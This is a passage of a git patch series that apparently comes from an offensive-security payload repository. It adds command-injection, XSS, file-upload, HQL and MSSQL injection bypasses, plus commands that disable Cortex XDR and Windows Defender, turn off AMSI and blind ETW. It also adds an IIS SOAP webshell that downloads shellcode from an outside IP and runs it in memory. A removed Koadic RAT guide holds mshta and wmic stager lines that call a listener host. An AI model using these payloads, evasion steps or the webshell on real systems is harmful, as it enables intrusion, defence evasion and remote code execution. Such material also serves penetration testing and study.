--graphicscontroller vmsvga +.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny" + +# Mount the VHD file +.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata +.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0 + +# Start the VM +.\VBoxManage.exe startvm $vmname –type headless + + +# optional - adding a shared folder +# require: VirtualBox Guest Additions +.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount +# then mount the folder in the VM +sudo mkdir /mnt/c +sudo mount -t vboxsf shadow_c /mnt/c +``` + + ## Domain ### User Certificate @@ -464,3 +520,4 @@ kerberos::tgt * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) +* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e559385..0c633a0 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -1,13 +1,12 @@ # Upload -Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Summary * [Tools](#tools) * [Exploits](#exploits) - * [Defaults extensions](#defaults-extension) - * [Other extensions](#other-extensions) + * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) * [Picture upload with LFI](#picture-upload-with-lfi) @@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at - Use double extensions : `.jpg.php` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` -- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr` +- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` - Null byte (works well against `pathinfo()`) - * .php%00.gif - * .php\x00.gif - * .php%00.png - * .php\x00.png - * .php%00.jpg - * .php\x00.jpg + * `.php%00.gif` + * `.php\x00.gif` + * `.php%00.png` + * `.php\x00.png` + * `.php%00.jpg` + * `.php\x00.jpg` - Special characters * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. - * Whitespace characters: `file.php%20` + * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg` * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. + * Slash: `file.php/`, `file.php.\` - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` * `Content-Type : image/gif` * `Content-Type : image/png` From 8a5e01f20dcdb7975aaee92cd25131b248fbd661 Mon Sep 17 00:00:00 2001 From: xplo1t-sec Date: Wed, 30 Mar 2022 03:13:18 -0400 Subject: [PATCH 42/50] added new bypass --- Command Injection/README.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 9df048a..9b66cc2 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -18,6 +18,7 @@ * [Bypass with double quote](#bypass-with-double-quote) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) + * [Bypass with $()](#bypass-with-$()) * [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with wildcards](#bypass-with-wildcards) * [Challenge](#challenge) @@ -209,6 +210,12 @@ echo $0 echo whoami|$0 ``` +### Bypass with $() +```powershell +who$()ami +who$(echo am)i +``` + #### Bypass with variable expansion ```powershell From 4d8a45db5a9164c4a0e60ffc645586c621541893 Mon Sep 17 00:00:00 2001 From: xplo1t-sec Date: Wed, 30 Mar 2022 03:14:41 -0400 Subject: [PATCH 43/50] added new bypass --- Command Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Command Injection/README.md b/Command Injection/README.md index 9b66cc2..5fdd66a 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -18,7 +18,7 @@ * [Bypass with double quote](#bypass-with-double-quote) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) - * [Bypass with $()](#bypass-with-$()) + * [Bypass with $()](#bypass-with--1) * [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with wildcards](#bypass-with-wildcards) * [Challenge](#challenge) From c885e7696744e28c4fa203982b6ee3f0a6a321ac Mon Sep 17 00:00:00 2001 From: xplo1t-sec Date: Wed, 30 Mar 2022 03:16:37 -0400 Subject: [PATCH 44/50] added new bypass --- Command Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 5fdd66a..e98534a 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -214,6 +214,7 @@ echo whoami|$0 ```powershell who$()ami who$(echo am)i +who`echo am`i ``` #### Bypass with variable expansion From 39d1c6e7d81d4b2c492d98c21c2b1c5d1c8cadc4 Mon Sep 17 00:00:00 2001 From: Ooggle <33269056+Ooggle@users.noreply.github.com> Date: Sat, 9 Apr 2022 12:55:21 +0200 Subject: [PATCH 45/50] Add document blacklist bypass --- XSS Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index f17abf3..5dee5d6 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -725,6 +725,7 @@ $ echo "" | xxd ```javascript

+window["doc"+"ument"] ``` ### Bypass using javascript inside a string From b0d05faded8f0e7b8fa0cab98f503a2178fda18b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Apr 2022 09:42:15 +0200 Subject: [PATCH 46/50] TruffleHog examples + Cortex XDR disable --- API Key Leaks/README.md | 7 + .../Windows - Persistence.md | 40 +++++- .../Windows - Post Exploitation Koadic.md | 123 ------------------ Server Side Request Forgery/README.md | 6 + 4 files changed, 49 insertions(+), 127 deletions(-) delete mode 100644 Methodology and Resources/Windows - Post Exploitation Koadic.md diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index acfb662..8438d2c 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -25,6 +25,13 @@ - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) +- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) + ```ps1 + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity + trufflehog git https://github.com/trufflesecurity/trufflehog.git + trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 + ``` ## Exploit diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index a95bd6f..8154ab5 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -64,6 +64,27 @@ PS> attrib +h mimikatz.exe Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y Elastic Agent has been uninstalled. ``` +* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/) + ```ps1 + # Global uninstall password: Password1 + Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db + Look for PasswordHash, PasswordSalt or password, salt strings. + + # Disable Cortex: Change the DLL to a random value, then REBOOT + reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f + + # Disables the agent on startup (requires reboot to work) + cytool.exe startup disable + + # Disables protection on Cortex XDR files, processes, registry and services + cytool.exe protect disable + + # Disables Cortex XDR (Even with tamper protection enabled) + cytool.exe runtime disable + + # Disables event collection + cytool.exe event_collection disable + ``` ### Disable Windows Defender @@ -73,19 +94,30 @@ sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true -# Wipe currently stored definitions -# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ -MpCmdRun.exe -RemoveDefinitions -All - ## Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\Video, C:\install +# Disable scanning all downloaded files and attachments, disable AMSI (reactive) +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +PS C:\> Set-MpPreference -DisableIOAVProtection $true +# Disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f + +# Wipe currently stored definitions +# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ +MpCmdRun.exe -RemoveDefinitions -All + +# Remove signatures (if Internet connection is present, they will be downloaded again): +PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` + ### Disable Windows Firewall ```powershell diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md deleted file mode 100644 index 9caea72..0000000 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ /dev/null @@ -1,123 +0,0 @@ -# Koadic C3 COM Command & Control - JScript RAT - -> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. - -## Installation - -```powershell -git clone https://github.com/zerosum0x0/koadic -git submodule init -git submodule update -pip2.7 install -r requirements.txt --user -python2.7 koadic -``` - -## Set a listener - -```powershell -use stager/js/mshta -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] mshta http://192.168.1.19:4444/6DX7f -``` - -```powershell -use stager/js/wmic -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" -``` - -### Stagers - -Stagers hook target zombies and allow you to use implants. - -Module | Description ---------|------------ -stager/js/mshta | serves payloads using MSHTA.exe HTML Applications -stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets -stager/js/wmic | serves payloads using WMIC XSL -stager/js/rundll32_js | serves payloads using rundll32.exe -stager/js/disk | serves payloads using files on disk - - - -## List zombies and interact with them - -```powershell -(koadic: sta/js/wmic)$ zombies - - ID IP STATUS LAST SEEN - --- --------- ------- ------------ - 0 192.168.1.30 Alive 2018-10-04 17:07:12 - -(koadic: sta/js/wmic)$ zombies 0 - ID: 0 - Status: Alive - First Seen: 2018-10-04 17:05:00 - Last Seen: 2018-10-04 17:14:42 - IP: 192.168.1.30 - User: DESKTOP-68URA9U\CrashWin - [...] - Elevated: No - [...] -``` - -Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. - -```powershell -[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami -[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. -[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. -Result for `cd C:\Users\CrashWin & whoami`: -desktop-68ura9u\crashwin -``` - -## Use an implant - -Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. - -```powershell -(koadic: sta/js/mshta)$ use implant/phish/password_box -(koadic: imp/phi/password_box)$ set ZOMBIE 1 -(koadic: imp/phi/password_box)$ run -Input contents: -MyStrongPassword123! -``` - -### Implants - -Implants start jobs on zombies. - -Module | Description ---------|------------ -implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. -implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. -implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. -implant/fun/voice | Plays a message over text-to-speech. -implant/gather/clipboard | Retrieves the current content of the user clipboard. -implant/gather/enum_domain_info | Retrieve information about the Windows domain. -implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. -implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. -implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). -implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). -implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). -implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). -implant/manage/enable_rdesktop | Enables remote desktop on the target. -implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. -implant/phishing/password_box | Prompt a user to enter their password. -implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. -implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. -implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. -implant/utils/download_file | Downloads a file from the target zombie. -implant/utils/multi_module | Run a number of implants in succession. -implant/utils/upload_file | Uploads a file from the listening server to the target zombies. - -## References - -- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) -- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5c..a16cb7d 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,6 +223,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +### Bypass using unicode + +In some languages (.NET, Python 3) regex supports unicode by default. +`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. + + ### Bypass filter_var() php function ```powershell From 1f73834d5e561581839d0f3279b8e1b81d6e60a7 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Thu, 14 Apr 2022 18:07:35 +0200 Subject: [PATCH 47/50] HQLi in Java apps - HITBSecConf2016 --- SQL Injection/HQL Injection.md | 104 +++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 6e8168b..97d3672 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,11 +1,18 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia + ## Summary * [HQL Comments](#hql-comments) * [HQL List Columns](#hql-list-columns) * [HQL Error Based](#hql-error-based) +* [Single Quote Escaping](#single-quote-escaping) +* [$-quoted strings](#--quoted-strings) +* [DBMS Magic functions](#dbms-magic-functions) +* [Unicode](#unicode) +* [Java constants](#java-constants) +* [Methods by DBMS](#methods-by-dbms) * [References](#references) ## HQL Comments @@ -49,10 +56,107 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro :warning: **HQL does not support UNION queries** +## Single Quote Escaping + +Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH `\'`. + +In HQL SINGLE QUOTES is escaped in strings by doubling `''`. + +``` +'abc\''or 1=(select 1)--' +``` + +In HQL it is a string, in MySQL it is a string and additional SQL expression. + +## $-quoted strings + +Method works for DBMS which allow DOLLAR-QUOTED strings in SQL expressions: PostgreSQL, H2. + +Hibernate ORM allows identifiers starting with `$$`. + +``` +$$='$$=concat(chr(61),chr(39)) and 1=1--' +``` + +## DBMS Magic functions + +Method works for DBMS which have MAGIC FUNCTIONS which evaluate SQL expression in string parameter: PostgreSQL, Oracle. + +Hibernate allows to specify any function name in HQL expression. + +PostgreSQL has built-in function `query_to_xml('Arbitrary SQL')`. + +``` +array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) +``` + +Oracle has built-in function `DBMS_XMLGEN.getxml('SQL')` + +``` +NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1' +``` + +## Unicode + +Method works for DBMS which allow UNICODE delimiters (Ex. U+00A0) between SQL tokens: Microsoft SQL Server, H2. + +In Microsoft SQL SERVER `SELECT LEN([U+00A0](select[U+00A0](1))` works the same as `SELECT LEN((SELECT(1)))`; + +HQL allows UNICODE symbols in identifiers (function or parameter names). + +``` +SELECT p FROM hqli.persistent.Post p where p.name='dummy' or 1CHAR(41) and (select count(1) from sysibm.sysdummy1)>0 --')=1 and '1'='1 +``` + +## Methods by DBMS + +![image](https://user-images.githubusercontent.com/16578570/163428666-a22105a8-287c-4997-8aef-8f372a1b86e9.png) + ## References * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) +* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf) * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) From c274874430ac09ec432eb28d21285b55fe9d0fd7 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 18 Apr 2022 17:21:26 +0200 Subject: [PATCH 48/50] MSSQL: list permissions --- SQL Injection/MSSQL Injection.md | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 920e2ac..ce645d4 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -23,6 +23,7 @@ * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) * [MSSQL Trusted Links](#mssql-trusted-links) +* [MSSQL List permissions](#mssql-list-permissions) ## MSSQL Comments @@ -297,6 +298,33 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` +## List permissions + +Listing effective permissions of current user on the server. + +```sql +SELECT * FROM fn_my_permissions(NULL, 'SERVER'); +``` + +Listing effective permissions of current user on the database. + +```sql +SELECT * FROM fn_my_permissions (NULL, 'DATABASE'); +``` + +Listing effective permissions of current user on a view. + +``` +SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; +``` + +Check if current user is a member of the specified server role. + +```sql +-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin +SELECT is_srvrolemember('sysadmin'); +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) @@ -306,3 +334,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) * [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e) * [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975) +* [Microsoft - sys.fn_my_permissions (Transact-SQL)](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15) +* [Microsoft - IS_SRVROLEMEMBER (Transact-SQL)](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15) From 1a5537a04494ac1767c8a75f372066a78fe72b39 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Apr 2022 20:58:14 +0200 Subject: [PATCH 49/50] Add warning about cPickle --- Insecure Deserialization/Python.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 98e843e..563db1c 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -3,6 +3,7 @@ ## Pickle The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. +:warning: `import cPickle` will only work on Python 2 ```python import cPickle From 578ea4d12b45f607d384ce912682c2adb2f4666c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Apr 2022 21:32:54 +0200 Subject: [PATCH 50/50] SOAP File Upload --- .../Extension ASP/shell.soap | 55 +++++++++++++++++++ Upload Insecure Files/README.md | 5 +- 2 files changed, 58 insertions(+), 2 deletions(-) create mode 100644 Upload Insecure Files/Extension ASP/shell.soap diff --git a/Upload Insecure Files/Extension ASP/shell.soap b/Upload Insecure Files/Extension ASP/shell.soap new file mode 100644 index 0000000..dcac007 --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.soap @@ -0,0 +1,55 @@ +<%@ WebService Language="C#" class="SoapStager"%> +using System; +using System.IO; +using System.Web; +using System.Web.Services; +using System.Net; +using System.Net.NetworkInformation; +using System.Net.Security; + +// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap +// https://github.com/0xbad53c/webshells/tree/main/iis + +[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] +public class SoapStager : MarshalByRefObject +{ + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); + + + [System.ComponentModel.ToolboxItem(false)] + [WebMethod] + public string loadStage() + { + string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode + byte[] rzjUFlLZh; + + IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy; + defaultWebProxy.Credentials = CredentialCache.DefaultCredentials; + + // in case of HTTPS + using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy }) + { + ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; + ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; }); + webClient.UseDefaultCredentials = true; + rzjUFlLZh = webClient.DownloadData(Url); + } + + + // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion + IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length); + IntPtr owlqRoQI_ms = IntPtr.Zero; + IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms); + + return "finished"; + } +} \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 0c633a0..0ccaea3 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -43,7 +43,7 @@ .phtm .inc ``` -* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)` +* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap` * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf` * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` @@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) -* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) \ No newline at end of file +* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) +* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) \ No newline at end of file